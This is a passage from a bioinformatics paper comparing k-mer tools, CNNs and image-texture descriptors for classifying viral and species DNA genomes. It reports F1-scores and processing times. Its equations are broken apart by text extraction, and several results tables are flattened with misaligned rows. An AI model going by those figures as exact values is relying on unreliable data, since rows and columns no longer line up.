20 epochs. 3.2
Kameris and Castor
Kameris is an open-source supervised, alignment-free subtyping method that operates on k-mer frequencies in HIV-1 sequences [50]. Mainly, the approach taken by Kameris is that feature vectors expressing the respective k-mer frequencies of the sequences virus sequences are passed to known supervised classifiers. Subsequently, the genomic sequences are preprocessed by the removal of any ambiguous nucleotide codes [13].
DNA Genome Classification
43
Castor-KRFE is an alignment-free method, which extracts discriminating kmers within known pathogen sequences to detect and classify new sequences accurately. This tool detects discriminating sub-sequences within known pathogenic sequences to accurately classify unknown pathogenic sequences, CASTOR is powerful in identifying a minimal set of features, making the job of classifying sequences much simpler, as well as increasing its performance [25]. 3.3
FOS, GLCM, LBP, and MLBP
3.3.1 First-Order Statistics First-Order Statistics is applied for DNA sequence similarity between two or more sequences, using alignment-free methods, which contribute to developing new mathematical descriptors on DNA sequences [10]. Proposed by Deliba et al. [10], they used alignment-free methods that convert the DNA sequences into feature vectors. They represented DNA sequences as images and then computed the histogram. Each pair of bases (Eq. 1) have a value from 0 to 15. Then, the feature vector is scaled to values from 1 to 255. The next step is to compute the histogram. Then, four attributes are computed from the histogram to form a feature vector: skewness, kurtosis, energy, and entropy (see Eqs. 2, 3, 4, 5). Finally, this feature vector could be used for similarity analysis against other vectors using the Euclidean distance: AA, AG, AC, AT, GA, GG, GC, GT, α= (1) CG, CC, CT, CA, T A, T G, T C, T T Skewness = σ −3
G−1
(i − μ)3 p(i)
(2)
(i − μ)4 p(i) − 3
(3)
i=0
Kurtosis = σ −4
G−1 i=0
Energy =
G−1
p(i)2
(4)
i=0
Entropy = −
G−1
p(i)lg(p(i))
(5)
i=0
where, p(i) = h(i)/N M , h(i) = histogram; N,M are image’s width and height; G−1 and μ = i=0 ip(i). 3.3.2 Gray-Level Co-Ocurrence Matrix GLCM is a technique for evaluating textures by taking into account the spatial relationship of pixels. It is a method of image texture analysis, which also makes its foray into bioinformatics [38]. The texture features that GLCM exports are entropy, contrast, energy, correlation, and homogeneity, which are useful to describe the image texture [6].
44
D. P. Cussi and V. E. Machaca Arceda
This algorithm was proposed by Chen et al. [6] for sequence alignment; they convert the DNA sequences into feature vectors and compute the GLCM. Each base in sequence S = {A, C, G, T } is mapped to the numbers S = {1, 2, 3, 4}. Then, they added to each value the base position. Finally, we compute GrayLevel Co-occurrence Matrix (GLCM). The GLCM, is an algorithm that processes the occurrence of changes in pixel neighbors’ intensities. For example in Fig. 1 (left), there is a 2D input matrix A with intensities from 1 to n = 5, so the GLCM matrix will be a n∗n matrix. Then, in the output matrix GLCM, the cell [i, j] represents the number of occurrences where a pixel with intensity i has a horizontal neighbor pixel with intensity j. In this form, the cell [1, 1], has a value of 1 because there is just one occurrence where a pixel with intensity 1 has a horizontal neighbor with intensity 1, in the input matrix. For cell [1, 2], it has a value of 2, because there are two occurrences where a pixel with intensity 1 has a horizontal neighbor with intensity 2. We could get more GLCM matrices if we consider vertical and diagonal neighbors, but in the work of Chen [6], they consider horizontal neighbors. After the GLCM is computed, it is normalized from 0 to 1. Then, the entropy, contrast, energy, correlation, and homogeneity are computed (see Eqs. 6, 7, 8, 9 and 10). These five features represent the sequence’s feature vector.
Fig. 1. Examples of GLCM Algorithm. Left: GLCM Computed from a 2D Matrix with Intensities from 1 to 5. Right: GLCM Computed from a 1D Vector with Intensities from 1 to 4.
Entropy = −
L L
p(i, j)Ln(p(i, j))
(6)
i=1 j=1
Contrast =
L L
(i − j)2 p(i, j)
(7)
i=1 j=1
Energy =
L L i=1 j=1
p(i, j)2
(8)
DNA Genome Classification
Correlation =
L L (i − μi )(j − μi )p(i, j) i=1 j=1
Homogeneity =
L L i=1 j=1
σi σj p(i, j) 1 + |i − j|
45
(9)
(10)
where, p(i, j) is the GLCM matrix and L is the maximun intensity value. 3.3.3 Multi-resolution Local Binary Pattern LBP is similar to the previous ones; it is a texture descriptor [51]. More specifically, LBP is an algorithm that describes the local texture features of an image. It has relevance in image processing, image retrieval, and scene analysis [28]. Initially, LBP was proposed for image texture analysis, but it has been updated to 1D signals; in Eq. 11, we present the LBP descriptor. p/2−1
LBP (x(t)) =
(Sign(x(t + i − p/2) − x(t))2i
i=0
(11)
+Sign(x(t + i + 1) − x(t))2i+p/2 ), where p in the number of neighbouring points and Sign is: 0, x < 0 Sign(x) = 1, x ≥ 0 δ(LBPp (x(i), k)), hk =
(12) (13)
p/2≤i≤N −p/2
where δ is the Kronecker delta function, k = 1, 2, .., 2p and N is the sequence length. In Eq. 13, hk represent the histogram and it is the feature vector of LBP descriptor. Then, the MLBP, is just an extension of LBP that combines the results of LBP with several values of p. Kouchaki proposed the use of MLBP for sequence alignment. First, they mapped a sequence with the values of Table 1, then they apply MLBP with p = 2, 3, 4, 5 and 6. Finally, the result was used as a feature vector for clustering. MLBP is adapted to data comparisons and numerical nucleotide sequences. MLBP can capture genomic signature changes optimally, allowing for nonaligned comparisons and clustering of related contigs [23].
4
Experiments and Results
In this section, we explains the datasets used, metrics and results of our experiments.
46
D. P. Cussi and V. E. Machaca Arceda Table 1. Numeric representation for each base used by Kouchaki et al. [23] Base Integer EIIP
4.1
Atomic Real
A
2
0.1260 70
–1.5
T
–2
0.1335 78
1.5
C
–1
0.1340 58
–0.5
G
2
0.0806 66
0.5
Datasets
We used the datasets from Castor and a group of datasets proposed by Randhawa et al. [39]. The first seven belong to Castor, and the rest to the second-mentioned database (see Table 2). HBVGENCG corresponds to the Hepatitis-B virus. HIVGRPCG, HIVSUBCG, and HIVSUBPOL belong to the first type of the human immunodeficiency virus (HIV-1); EBOSPECG handles a set of sequences of the deadly Ebola disease; RHISPECG, on the other hand, is related to a common cold (Rhinovirus), and HPVGENCG is related to Human papillomavirus, a sexually transmitted disease. Table 2. Datasets used in the experiments Datasets HIVGRPCG
Average seq.length No. of classes No. of instances 9164
4
76
HIVSUBCG
8992
18
597
HIVSUBPOL
1211
28
1352
EBOSCPECG 18917
5
751
HBVGENCG
3189
8
230
369
3
1316
RHISPECG HPVGENCG
7610
3
125
16626
2
148
Dengue
10595
4
4721
Protists
31712
3
159
Primates
Fungi
49178
3
224
Plants
277931
2
174
Amphibians
17530
3
290
Insects
15689
7
898
Vertebrates
16806
5
4322
DNA Genome Classification
4.2
47
Metrics
The performance of the proposed approach was assessed using popular classification performance metrics, we employed the f1-score as the main metric, presented in the equation shown below: F1 =
2T P 2T P + F P + F N
(14)
where TP, FP, and FN stand for true positives, false positives, and false negatives, respectively. 4.3
Results
In this section, we have compared performance between Castor, Kameris, VGG16, VGG19, Resnet-50, Inception-v3, and image descriptor methods. In Table 3, we show the best f1-score we obtained with k = 5. We presented Kameris and Castor without dimensionality reduction and feature elimination (they got better results in this way). CNNs had results quite close to Castor and Kameris. Moreover, in Table 4 and 5, we present experiments with 5-mer, 6-mer and 7-mer where we present certain improvements, in database Plants in CNN Inception with k = 7 , having as relevant result a f1-score in Tables 4, and 5 (the highest score respect to Plants), similar to Castor and outperforming Kameris. In addition, we tested with feature vectors belonging to image descriptor methods, and with these, we made predictions with three popular machine learning methods: SVM, RFC, and KNN. On the other hand, these predictions did not use k-mer. In Table 8, where we put the best f1-scores extracted from Tables 7, 6, and 3, it is clearly shown that image descriptor methods, work better with SVM and, that they outperform Castor and Kameris on bds such as Plants, h1vsubpool, Vertebrates, and Insects showing a promising outlook for DNA species classification. VGG19 (the better CNN) scored lower than Kameris, and Castor, although it was able to match them in some databases. Similarly, it underperfomed the alignment-free methods FOS, GLCM, LBP, and MLBP. Respect to the previous paper that is inspired this work, we can notice that there is an improvement in image descriptor methods using SVM classifier, because these show a better performance compared with kameris and castor. Additionally, respect to the related works we can deduce that image descriptor methods are like the best alternative in dna genome classification, being FOS an interesting method. The reason is because this method is very similar to k-mer frequencies, with k = 2. This is probably the reason why FOS outperforms the rest even in processing time. 4.4
Processing Time
There are two kinds of processing time: feature vector generation time and the second one, which is performed by taking the mentioned vector or, in the case
48
D. P. Cussi and V. E. Machaca Arceda
Table 3. We present best f1-scores of the methods proposed. We use 5-mer for all methods Dataset
Kameris Castor VGG16 VGG19 Resnet-50 Inception-v3
HIVGRPCG
1
1
0.8378
1
HIVSUBCG
1
1
0.9654
0.9832 0.9490
HIVSUBPOL
0.993
0.7997
1 0.9183
0.993
0.9418 0.9251
0.9382
0.7520
EBOSCPECG 1
1
1
1
1
1
HBVGENCG
1
1
1
0.9558
0.9781
0.9779
RHISPECG
1
1
1
1
0.9962
0.9771
HPVGENCG
1
1
0.9595
1
0.9173
0.9200
Primates
1
1
1
0.9235
0.9234
0.9235
Dengue
1
1
1
1
1
1
Protists
1
1
0.9103
0.9375
0.8893
1
Fungi
1
1
0.9782
0.9782 0.9574
0.8792
Plants
0.882
0.972 0.8857
0.7901
0.9152
0.8823
Amphibians
1
1
0.9647
0.9617
0.9819
0.9116
Insects
0.994
0.994 0.9103
0.9312 0.9105
0.8801
Vertebrates
0.998
0.998 0.9802
0.9874 0.9837
0.9573
Table 4. We present f1-score with several k-mers for VGG16 and VGG19 Dataset
VGG16 k=5 k=6
HIVGRPCG
0.8378
HIVSUBCG
0.9654 0.9091
HIVSUBPOL
0.9418
k=7
0.9367 0.9125
VGG19 k=5 k=6 1
k=7
0.9295
0.6728
0.9286
0.9832 0.9117
0.9358
0.9525 0.9291
0.9251 0.7819
0.7796
EBOSCPECG 1
1
0.9940
1
0.9940
1
HBVGENCG
1
0.9779
1
0.9558
1
1
RHISPECG
1
0.9925
1
1
0.9962
0.9924
HPVGENCG
0.9595 0.8844
0.92
1
0.8786
0.8828
Primates
1
0.9333
0.8727
0.9235
0.9646 0.8727
Dengue
1
1
1
1
1
1
Protists
0.9103
0.8843
0.9701 0.9375
0.9382
0.9422
Fungi
0.9782 0.8866
0.9314
0.9782 0.8866
0.9314
Plants
0.8857
0.8501
0.9428 0.7901
0.9429 0.9152
Amphibians
0.9116
0.9502
1
0.9647
0.9827 0.9820
Insects
0.9103 0.8914
0.8705
0.9312 0.9117
0.8930
Vertebrates
0.9802 0.9798
0.9766
0.9874 0.9721
0.9716
DNA Genome Classification
49
Table 5. We present the f1-score with several k-mers for Resnet-50 and inception Dataset HIVGRPCG
Resnet-50 k=5 k=6
k=7
Inception k=5 k=6
k=7
0.7997
0.8487
1
1
0.7628
0.6578
HIVSUBCG
0.9490
1
0.9458
0.9183
0.9117
0.9359
HIVSUBPOL
0.9382
0.9525 0.9366
0.7520
0.9331
0.9405
EBOSCPECG 1
1
1
1
1
1
HBVGENCG
0.9579
0.9778 0.9779
1
0.9784
0.9924 0.9801
0.9781
RHISPECG
0.9962
0.9886
0.9962
HPVGENCG
0.9173
0.8844
0.9200 0.9200 0.8786
Primates
0.9234
0.9235 0.8727
0.9235
Dengue
1
1
1
0.999
0.998
Protists
0.8893
0.9679 0.8893
1
1
1
Fungi
0.9574 0.9108
0.8829
0.8792
0.9157 0.9110
Plants
0.9152 0.8857
0.9152
0.8823
0.9429
Amphibians
0.9617 0.9457
0.9277
0.9819 0.9381
0.8974
Insects
0.9105 0.9046
0.8656
0.8801 0.8316
0.8091
Vertebrates
0.984
0.981
0.9573
0.9289
1
0.965
0.9771
0.8828
0.9646 0.8727
0.9510
0.9717
Table 6. We show the f1-Score of LBP and MLBP, using Support Vector Machine (SVM), Random Forest Classifier (RFC), and K-Nearest Neighboors (KNN) Dataset
LBP-SVM LBP-RFC LBP-KNN MLBP-SVM MLBP-RFC MLBP-KNN
HIVGRPCG
1
0.8685
0.9892
1
0.7940
0.9776
HIVSUBCG
1
0.7932
0.9958
1
0.6060
0.9860
HIVSUBPOL
1
0.62966
0.9834
1
0.4000
0.9800
0.9966
0.9977
1
0.9777
1
EBOSCPECG 1 HBVGENCG
1
0.7933
0.9830
1
0.8324
1
RHISPECG
1
0.8421
0.9801
1
0.9141
0.9961
HPVGENCG
1
0.9797
1
1
0.9457
1
Primates
1
0.9601
1
1
0.9198
1
Dengue
1
0.7866
0.9929
1
0.9767
0.9985
Protists
1
0.9523
1
1
0.9578
0.9894
Fungi
1
0.9555
0.9888
1
0.9777
1
Plants
1
0.9904
1
1
0.9917
1
Amphibians
1
0.9300
1
1
0.9195
1
Insects
1
0.7960
0.9786
1
0.7035
0.9897
Vertebrates
1
0.7510
0.9862
1
0.8536
0.9930
50
D. P. Cussi and V. E. Machaca Arceda
Table 7. We show f1-Score of FOS and GLCM, using Support Vector Machine (SVM), Random Forest Classifier (RFC), and K-Nearest Neighboors (KNN) Dataset
FOS-SVM FOS-RFC FOS-KNN GLCM-SVM GLCM-RFC GLCM-KNN
HIVGRPCG
1
0.7954
1
1
0.6803
HIVSUBCG
1
1
0.9958
1
0.9820
0.9958
HIVSUBPOL
1
0.5316
0.9901
1
0.4000
0.9800
0.9891
EBOSCPECG 1
1
0.9988
1
0.9909
1
HBVGENCG
0.6657
0.9963
1
0.7140
0.9927 0.9917
1
RHISPECG
1
0.7982
0.9556
1
0.7830
HPVGENCG
1
0.8045
1
1
0.7751
0.9933
Primates
1
0.9887
0.9887
1
0.9712
0.9889 0.9944
Dengue
1
0.7866
0.9929
1
0.8820
Protists
1
0.7911
1
1
0.7975
1
Fungi
1
0.9555
0.9888
1
0.8228
0.9926
Plants
1
0.9904
1
1
0.8834
0.9806
Amphibians
1
0.9300
1
1
0.7862
0.9913
Insects
1
0.6539
0.9943
1
0.6593
0.9871
Vertebrates
0.9988
0.9949
0.9949
1
0.7786
0.9946
Table 8. We show the best results extracted from Tables 3, 6, and 7 Dataset
Kameris Castor FOS-SVM GLCM-SVM LBP-SVM MLBP-SVM VGG19
HIVGRPCG
1
1
1
1
1
1
1
HIVSUBCG
1
1
1
1
1
1
0.983
HIVSUBPOL
0.993
0.993
1
1
1
1
0.925
EBOSCPECG 1
1
1
1
1
1
1
HBVGENCG
1
1
1
1
1
1
0.955
RHISPECG
1
1
1
1
1
1
1
HPVGENCG
1
1
1
1
1
1
1
Primates
1
1
1
1
1
1
0.923
Dengue
1
1
1
1
1
1
1
Protists
1
1
1
1
1
1
0.937
Fungi
1
1
1
1
1
1
0.978
Plants
0.882
0.972
1
1
1
1
0.790
Amphibians
1
1
1
1
1
1
0.965
Insects
0.994
0.994
1
1
1
1
0.931
Vertebrates
0.998
0.998
0.998
1
1
1
0.987
of CNNs, the generated image, called prediction time. The latter is the sum of the time of the first mentioned and the time taken for the prediction. For Kameris and Castor, we measured the processing time to get the feature vectors. Additionally, to generate the FCGR image based on Intelligent Icons
DNA Genome Classification
51
we calculated the processing time with eight random sequences. Castor had the best processing time. In Table 9, we detailed the prediction time. Kameris and Castor outperformed CNNs in processing time. Also, they both got better times than the image descriptor methods because the four mentioned used SVM, KNN, and RFC as classifiers. Resnet-50 obtained times close to Castor and Kameris being better in some cases. Furthermore, in Table 13, we present the feature vector generation time. There are two types of predictions in Tables 10, 11, 12, using SVM, RFC, and KNN. FOS obtained the best prediction time compared to GLCM, LBP, and MLBP, being MLBP the one that used an exponential time. Likewise, FOS and GLCM obtained times similar to CNNs, and slightly better than Castor and Kameris. The database that consumed more time and resources was Plants because despite having a small number of sequences compared to the other bds, its genomes are large. Table 9. We presented the time in milliseconds to perform predictions for Kameris, Castor, VGG16, VGG19, Resnet-50, and Inception-v3’s cases Dataset
Kameris Castor
VGG16 VGG19 Resnet-50 Inception v3 Sequence length
HIVGRPCG
319.781
141.021 517.062 629.199 149.530
372.776
8654
HIVSUBCG
297.834
133.746 526.036 632.170 148.749
370.247
8589
HIVSUBPOL
43.919
EBOSPECG
642.427
HBVGENCG
113.392 13.916
HPVGENCG Primates
RHISPECG
20.018 514.573 643.902 147.104
370.454
1017
368.756
18828
50.541 518.405 626.492 149.673
375.796
3182
6.625 516.140 634.218 147.387
370.164
369
266.930
117.776 512.843 633.415 157.982
369.680
7100
579.338
254.598
376.814
16499
283.368
522.682 633.308 146.739
524.119 628.240 146.379
Dengue
348.030
157.447
515.302 632.949 148.390
380.846
10313
Protists
1105.138
490.876
513.511 629.238 153.244
373.343
24932
Fungi
1642.195
717.410
511.470 627.220 147.211
370.570
190834
Plants
5515.720 2443.862
516.660 626.762 147.379
373.236
103830
Amphibians
567.987
252.171
516.356 634.881 153.083
374.721
16101
Insects
531.752
233.795
513.336 635.343 147.526
372.987
14711
Vertebrates
562.125
263.150
513.335 626.717 149.502
374.435
16442
5
Discussion
In the work, we have realized some experiments to understand which are the better alignment-free methods in two aspects: f1-score and processing time. We were
52
D. P. Cussi and V. E. Machaca Arceda
Table 10. We presented the time in milliseconds to perform predictions for cases of FOS, GLCM, LBP and MLBP, using SVM algorithm Dataset
FOS-SVM GLCM-SVM LBP-SVM MLBP-SVM Sequence length
HIVGRPCG
407.311
668.111
3622.970
3724.500
8654
HIVSUBCG
398.828
680.570
3569.309
10125.360
8589
HIVSUBPOL
191.670
450.070
622.404
1540.680
1017
EBOSCPECG
665.550
910.982
7185.070
20750.720
18828
HBVGENCG
255.128
507.173
1343.540
3765.345
3182
RHISPECG
167.250
430.730
166.426
580.290
369
HPVGENCG
360.140
635.323
3022.705
8838.360
7100
Primates
580.250
860.828
6412.801
19360.160
16499
440.207
Dengue
709.300
4008.250
12140.751
10313
Protists
1005.820 1240.820
6412.820
36001.032
24932
Fungi
1480.750 1640.750
18105.190
53434.640
190834
Plants
4800.755
4711.190
61409.530
180510.82
103830
Amphibians
630.450
950.326
6270.190
18939.231
16101
Insects
571.800
847.900
6060.421
17859.780
14711
Vertebrates
455.203
711.365
6130.20
18750.111
16442
Table 11. We presented the time in milliseconds to perform predictions for cases of FOS, GLCM, LBP, and MLBP using RFC algorithm
Dataset
FOS-RFC GLCM-RFC LBP-RFC MLBP-RFC Sequence length
HIVGRPCG
407.310
665.107
3625.855
3712.500
8654
HIVSUBCG
398.815
679.470
3572.318
10112.360
8589
HIVSUBPOL
191.675
449.111
630.414
1545.680
1017
EBOSCPECG
665.555
908.979
7182.070
20758.720
18828
HBVGENCG
255.130
502.170
1344.540
3775.345
3182
RHISPECG
166.249
428.725
160.426
599.290
369
HPVGENCG
350.142
633.330
3025.710
8988.360
7100
Primates
575.255
859.825
6480.810
19356.162
16499
Dengue
435.214
704.315
4010.255
12142.751
10313
Protists
1001.814 1245.828
6412.608
36001.032
24932
Fungi
1475.715 1641.753
18115.290
53432.640
190834
Plants
4678.740 4718.195
61403.531 180508.82
103830
Amphibians
625.440
955.322
6230.190
18926.231
16101
Insects
565.798
843.920
6050.421
17840.780
14711
Vertebrates
455.201
713.368
6115.20
18725.110
16442
DNA Genome Classification
53
Table 12. We presented the time in milliseconds to perform predictions for cases of FOS, GLCM, LBP and MLBP, using KNN algorithm Dataset HIVGRPCG
FOS-KNN GLCM-KNN LBP-KNN MLBP-KNN Sequence length 407.320
665.117
3615.680
3726.500
8654
HIVSUBCG
398.818
679.495
3572.320
10131.360
8589
HIVSUBPOL
191.692
449.131
615.414
1559.680
1017
EBOSCPECG
665.585
908.985
7299.070
20798.720
18828
HBVGENCG
255.145
510.175
1515.540
3780.345
3182
RHISPECG
169.251
435.735
176.426
650.290
369
HPVGENCG
368.140
638.392
3049.710
9001.360
7100
Primates
575.260
859.801
6499.810
22152.312
16499
440.215
Dengue
692.307
4068.255
12590.746
10313
1015.822 1230.815
6445.608
36015.078
24932
Fungi
1480.710 1615.712
18215.290
53440.656
190834
Plants
4678.722 4722.184
61349.531
180512.815
103830
6267.190
19126.231
16101
Protists
Amphibians
615.440
912.398
Insects
592.805
898.915
6117.421
18440.640
14711
Vertebrates
465.215
765.334
6132.20
18712.220
16442
able to infer that the image descriptor methods are better in results, although in the processing time we noticed that Castor and Resnet-50 were the best with the most optimal time. By contrast, MLBP got the slowest time by far, for example in 10 where the image descriptor methods are using SVM, MLBP got 180510.82 milliseconds that is a exponential time, in plants database, which has a very large genome, all this in spite of having obtained a good a f1-score. Additionally, only for generating the feature vector in Table 13 we understand that Castor has the better time in all cases. Finally we have noticed that FOS has the betters times to perform predictions, this is might because the method has a relationship with the k-mer and processes the data more easily. Additionally, Castor and kameris had very close results despite only using SVM as a classifier, but the image descriptor methods got in almost all cases 100% in f1-score surpassing them. Moreover, the CNNs do not reach the SVM level due to the lack of samples or public databases to train them.
6
Limitations
In this study, we have noticed that FCGR image generation demands a more considerable time as the length of the k-mer increases, specifically in k=5, a more powerful GPU and more amount of RAM would be needed to be able to generate the images and to be able to train CNNs. Likewise, for the second part of the work, which consists of training the CNNs with the FCGR images, more
54
D. P. Cussi and V. E. Machaca Arceda
computational capacity is needed, both in the RAM and in the GPU, because from 2000 images, CNN training is exponentially slower. Additionally, in the generation of the vectors concerning to FOS, GLCM, LBP, and MLBP, we have noticed that MLBP takes a considerably long time, taking into account that only 8 test sequences were used during 10 repetitions for the experiment, inferring that if all the complete databases were used the time employed would not be acceptable. Table 13. Processing time in milliseconds. We showed the processing time to generate a feature vector of kameris and castor, and image generation in the case of fcgr inspired by the intelligent icons paper. Also, we present the processing time to generate the feature vector of FOS, GLCM, LBP, and MLBP. We used 8 random sequences for all cases, and 5-mer in Kameris, Castor, and the FCGR imagen generation. The processing time was obtained after executing each mentioned case 10 times Dataset
Kameris Castor
Imagen generation
FOS
GLCM
BLP
MLBP
Sequence length
HIVGRPCG
319.603 140.910
7962.560
267.606
556.720
3394.642 10176.645
8654
HIVSUBCG
297.660 133.637
8097.371
254.532
523.795
3244.866
9763.489
8589
HIVSUBPOL
43.790 19.893
7993.734
53.488
306.918
466.795
1363.745
1017
EBOSCPECG
642.282 283.257
8039.344
508.603
787.700
7005.136 20454.488
18828
HBVGENCG
113.221 50.438
7884.267
104.132
399.19
1184.879
3616.148
13.796 6.53064
8211.903
29.710
328.248
140.611
410.564
369
HPVGENCG
266.754 117.668
7980.977
222.328
509.008
2862.636
8559.799
7100
Primates
579.158 254.484
8047.256
457.480
709.668
6123.200 18092.78
Dengue
347.867 157.344
7868.328
298.502
586.059
3902.443 11804.980
Protists
1104.980 490.764
8131.914
851.886
Fingi
1642.013 717.287
8353.357
1269.872
1486.723 17747.163 52737.838
190834
Plants
5515.532 2443.748 9401.827
4412.888
4447.10
103830
RHISPECG
1127.297 11279.85
34617.4301
60150.70 178225.92
3182
16499 10313 24932
Amphibians
567.823 252.059
7996.048
475.382
719.989
6259.095 18317.007
Insects
531.588 233.682
8086.115
421.914
690.535
5665.195 17387.733
14711
Vertebrates
561.954 263.036
8024.314
458.204
712.370
6132.39
16442
18579.14
16101
Finally, the times employed in the Tables 10, 11, and 12, for predictions using SVM, RFC, and KNN show a slightly longer time in FOS and GLCM compared to the neural networks and castor with Kameris, besides concluding that in all the tables LBP and MLBP are the ones that consumed too many time resources, contrasting the excellent results obtained in the f1-scores.
7
Conclusions
In this work, we evaluated Kameris, Castor, VGG16, VGG19, Resnet-50, and Inception, for DNA genome classification. Moreover, we evaluated with different k-mers. Additionally, we have experimented with FOS, GLCM, LBP, and MLBP, which did not use k-mers.
DNA Genome Classification
55
We inferred that the methods based on image descriptors are the best performers even though they did not use k-mers, obtaining 100% in almost all predictions with SVM, followed by Kameris and Castor. CNNs were relegated to the last position, where VGG19 was the CNN most representative. Finally , we were able to observe that Castor’s processing time was the better. By contrast, we realized that the image generation time with FCGR and MLBP processing time employed a lot of time. Moreover, FOS (the better image descriptor) obtained a time close to kameris, as a relevant result.
8
Future Work
In this work, FOS, GLCM, LBP, and MLBP are better than Kameris, Castor, and CNNs in most cases. Nevertheless, we don’t have several samples in databases, and the number of classes differs from each database. To perform better experiments, we will build a new dataset and, we will evaluate more sophisticated deep learning techniques.
References 1. Abd-Alhalem, S.M., et al.: DNA sequences classification with deep learning: a survey. Menoufia J. Electron. Eng. Res. 30(1), 41–51 (2021) 2. Almeida, J.S., Carrico, J.A., Maretzek, A., Noble, P.A., Fletcher, M.: Analysis of genomic sequences by chaos game representation. Bioinformatics 17(5), 429–437 (2001) 3. Bakheet, S., Al-Hamadi, A.: Automatic detection of Covid-19 using pruned GLCMbased texture features and LDCRF classification. Comput. Biol. Med. 137, 104781 (2021) 4. Barburiceanu, S., Terebes, R., Meza, S.: 3D texture feature extraction and classification using GLCM and LBP-based descriptors. Appl. Sci. 11(5), 2332 (2021) 5. Campagna, D., et al.: Rap: a new computer program for de novo identification of repeated sequences in whole genomes. Bioinformatics 21(5), 582–588 (2005) 6. Chen, W., Liao, B., Li, W.: Use of image texture analysis to find DNA sequence similarities. J. Theor. Biol. 455, 1–6 (2018) 7. Choi, J.Y., Kim, D.H., Choi, S.H., Ro, Y.M.: Multiresolution local binary pattern texture analysis for false positive reduction in computerized detection of breast masses on mammograms. In: Medical Imaging 2012: Computer-Aided Diagnosis, vol. 8315, pp. 676–682. SPIE (2012) 8. Riccardo Concu and MNDS Cordeiro: Alignment-free method to predict enzyme classes and subclasses. Int. J. Molec. Sci. 20(21), 5389 (2019) 9. Cores, F., Guirado, F., Lerida, J.L.: High throughput blast algorithm using spark and cassandra. J. Supercomput. 77, 1879–1896 (2021) 10. Deliba¸s, E., Arslan, A.: DNA sequence similarity analysis using image texture analysis based on first-order statistics. J. Molec. Graph. Model. 99, 107603 (2020) 11. Deschavanne, P.J., Giron, A., Vilain, J., Fagot, G., Fertil, B.: Genomic signature: characterization and classification of species assessed by chaos game representation of sequences. Molec. Biol. Evol. 16(10), 1391–1399 (1999)
56
D. P. Cussi and V. E. Machaca Arceda
12. Dogan, B.: An alignment-free method for bulk comparison of protein sequences from different species. Balkan J. Electr. Comput. Eng. 7(4), 405–416 (2019) 13. Fabija´ nska, A., Grabowski, S.: Viral genome deep classifier. IEEE Access 7, 81297– 81307 (2019) 14. Gao, Y., Li, T., Luo, L.: Phylogenetic study of 2019-ncov by using alignment-free method. arXiv preprint arXiv:2003.01324 (2020) 15. Gollery, M.: Bioinformatics: sequence and genome analysis. Clin. Chem. 51(11), 2219–2220 (2005) 16. Gunasekaran, H., Ramalakshmi, K., Arokiaraj, A.R.M., Kanmani, S.D., Venkatesan, C., Dhas, C.S.G.: Analysis of DNA sequence classification using CNN and hybrid models. Comput. Math. Methods Med. 2021 (2021) 17. Hammad, M.S., Ghoneim, V.F., Mabrouk, M.S.: Detection of Covid-19 using genomic image processing techniques. In: 2021 3rd Novel Intelligent and Leading Emerging Sciences Conference (NILES), pp. 83–86. IEEE (2021) 18. He, K., Zhang, X., Ren, S., Sun, J.: Deep residual learning for image recognition. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 770–778 (2016) 19. He, L., Dong, R., He, R.L., Yau, S.S.-T.: A novel alignment-free method for hiv-1 subtype classification. Infect. Genet. Evol. 77, 104080 (2020) 20. Kaur, N., Nazir, N., et al.: A review of local binary pattern based texture feature extraction. In: 2021 9th International Conference on Reliability, Infocom Technologies and Optimization (Trends and Future Directions)(ICRITO), pp. 1–4. IEEE (2021) 21. Keogh, E., Wei, L., Xi, X., Lonardi, S., Shieh, J., Sirowy, S. Intelligent icons: integrating lite-weight data mining and visualization into gui operating systems. In: Sixth International Conference on Data Mining (ICDM 2006), pp. 912–916. IEEE (2006) 22. Kola, D.G.R., Samayamantula, S.K.: A novel approach for facial expression recognition using local binary pattern with adaptive window. Multimedia Tools Appl. 80(2), 2243–2262 (2021) 23. Kouchaki, S., Tapinos, A., Robertson, D.L.: A signal processing method for alignment-free metagenomic binning: multi-resolution genomic binary patterns. Sci. Rep. 9(1), 1–10 (2019) 24. Kumar, N., Lolla, V.N., Keogh, E., Lonardi, S., Ratanamahatana, C.A., Wei, L.: Time-series bitmaps: a practical visualization tool for working with large time series databases. In: Proceedings of the 2005 SIAM International Conference on Data Mining, pp. 531–535. SIAM (2005) 25. Lebatteux, D., Remita, A.M., Diallo, A.B.: Toward an alignment-free method for feature extraction and accurate classification of viral sequences. J. Comput. Biol. 26(6), 519–535 (2019) 26. Lee, B., Smith, D.K., Guan, Y.: Alignment free sequence comparison methods and reservoir host prediction. Bioinformatics 37, 3337–3342 (2021) 27. Leinonen, M., Salmela, L.: Extraction of long k-mers using spaced seeds. arXiv preprint arXiv:2010.11592 (2020) 28. Li, Y., Li, L.-P., Wang, L., Chang-Qing, Yu., Wang, Z., You, Z.-H.: An ensemble classifier to predict protein-protein interactions by combining pssm-based evolutionary information with local binary pattern model. Int. J. Molec. Sci. 20(14), 3511 (2019) 29. Lichtblau, D.: Alignment-free genomic sequence comparison using fcgr and signal processing. BMC Bioinf. 20(1), 1–17 (2019)
DNA Genome Classification
57
30. Liu, Z., Gao, J., Shen, Z., Zhao, F.: Design and implementation of parallelization of blast algorithm based on spark. DEStech Trans. Comput. Sci. Eng. (IECE) (2018) 31. Arceda, V.E.M.: An analysis of k-mer frequency features with svm and cnn for viral subtyping classification. J. Comput. Sci. Technol. 20 (2020) 32. Mahmoud, M.A.B., Guo, P.: DNA sequence classification based on mlp with pilae algorithm. Soft Comput. 25(5), 4003–4014 (2021) 33. Mohan, N., Varshney, N.: Facial expression recognition using improved local binary pattern and min-max similarity with nearest neighbor algorithm. In: Tiwari, S., Trivedi, M.C., Mishra, K.K., Misra, A.K., Kumar, K.K., Suryani, E. (eds.) Smart Innovations in Communication and Computational Sciences. AISC, vol. 1168, pp. 309–319. Springer, Singapore (2021). https://doi.org/10.1007/978-981-15-53455 28 ¨ urk, S 34. Ozt¨ ¸ , Akdemir, B.: Application of feature extraction and classification methods for histopathological image using glcm, lbp, lbglcm, glrlm and sfta. Procedia Comput. Sci. 132, 40–46 (2018) 35. Panthakkan, A., Anzar, S.M., Al Mansoori, S., Al Ahmad, H.: Accurate prediction of covid-19 (+) using ai deep vgg16 model. In: 2020 3rd International Conference on Signal Processing and Information Security (ICSPIS), pp. 1–4. IEEE (2020) 36. Prakasa, E.: Texture feature extraction by using local binary pattern. INKOM J. 9(2), 45–48 (2016) 37. Pratas, D., Silva, R.M., Pinho, A.J., Ferreira, P.J.S.C.: An alignment-free method to find and visualise rearrangements 